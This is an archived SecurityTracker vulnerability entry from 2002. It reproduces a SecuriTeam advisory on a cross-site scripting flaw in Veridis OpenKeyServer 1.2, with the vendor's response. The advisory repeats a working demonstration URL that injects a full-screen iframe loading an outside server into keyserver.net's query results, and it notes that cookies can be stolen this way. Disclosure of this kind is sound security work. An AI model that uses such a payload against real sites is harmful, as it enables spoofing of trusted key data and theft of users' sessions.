Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
Veridis OpenKeyServer Allows Cross-Site Scripting Attacks
|
Date: Mar 29 2002
|
Impact: Disclosure of authentication information, Execution of arbitrary code via network
|
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 1.2
|
Description: A vulnerability was reported in the Veridis OpenKeyServer (OKS), a repository for PGP keys. A remote user can conduct cross-site scripting attacks against OKS users.
SecuriTeam reported that there is a vulnerability in the way that the OKS server returns results of key queries. A remote user can
reportedly insert malicious code into existing replies.
A demonstration exploit is provided:
http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cne
tennom
atch%2Cnetenerror&search=<iframe%20style="position:absolute;left:0;top:0"%20
%20frameborder=0%20scrolling=0%20noresize%20%20width=800%20height=900%20src=
http:/
/www.securiteam.com/openkeyservertemp/></iframe>&op=index
(All < should be present and not replaced by <).
For this demonstration
exploit to work, a few bogus HTML pages are required on a remote user to cause any user accessing the above URL to be unaware of
the connection to the malicious server.
exploitstring:http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennomatch%2Cnetenerror&search=<iframe%20style="position:absolute;left:0;top:0"%20%20frameborder=0%20
scrolling=0%20noresize%20%20width=800%20height=900%20src=http://www.securiteam.com/openkeyservertemp/></iframe>&op=index
|
Impact: A remote user can conduct cross-site scripting attacks against OpenKeyServer users to steal their cookies and other sensitive information associated with the web site running OKS.
|
Solution: No solution was available at the time of this entry. The vendor is reportedly working on a fix for the next release.
|
Vendor URL: www.openkeyserver.org/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS)
|
Reported By: support@securiteam.com
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Mar 2002 05:14:04 -0600
From: support@securiteam.com
Subject: [NEWS] Keyservers Cross Site Scripting (When CSS Gets Dangerous)
|
The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Keyservers Cross Site Scripting (When CSS Gets Dangerous)
------------------------------------------------------------------------
SUMMARY
<http://www.openkeyserver.org/> OKS (OpenKeyServer) has been developed to
cope with the fast growing number of PKS encryption software baring in
mind the need for reliability. OKS provides a secure repository for a
large amount of PGP public keys. Its architecture is composed of several
inter-communicating modules and allows you to scale it to fit your needs.
The capacity of OKS goes from keyrings of hundred keys to keyrings of
hundreds of thousands.
A security vulnerability in the way the server returns results of key
queries allows attackers to insert malicious code into existing replies.
This is of particular danger when it comes to keyservers, since the key
information itself is usually considered as highly trustworthy.
DETAILS
Vulnerable systems:
OpenKeyServer version 1.2
Example:
http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennom
atch%2Cnetenerror&search=<iframe%20style="position:absolute;left:0;top:0"%20
%20frameborder=0%20scrolling=0%20noresize%20%20width=800%20height=900%20src=
http://www.securiteam.com/openkeyservertemp/></iframe>&op=index
(All < should be present and not replaced by <).
In order to complete the attack, all you need to do is create a few small
HTMLs on your server, causing anyone accessing the above URL to not know
he is no longer accessing keyserver.net but rather someone else's server.
Vendor response:
We have received the following response (Tuesday, March 05, 2002 20:33):
"We thank you for informing us of this vulnerability onto our software and
we are pleased to announce you that a fix to this trouble will be
available into the next release of the OpenKeyServer.
Therefore be sure we will provide you with this new version in order for
your team to keep your database up-to-date.
We remain at your entire disposal and please do not hesitate to contact us
for any other remarks regarding our software.
Best regards,
S. Lemmens"
We have not heard from them again, even though we sent them a message
requesting information when the newer version will be available.
ADDITIONAL INFORMATION
The information has been provided by <mailto:experts@securiteam.com>
SecurITeam Experts and <mailto:slemmens@veridis.com> Sebastien Lemmens.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
profits or special damages.
|
|
Go to the Top of This SecurityTracker Archive Page
|
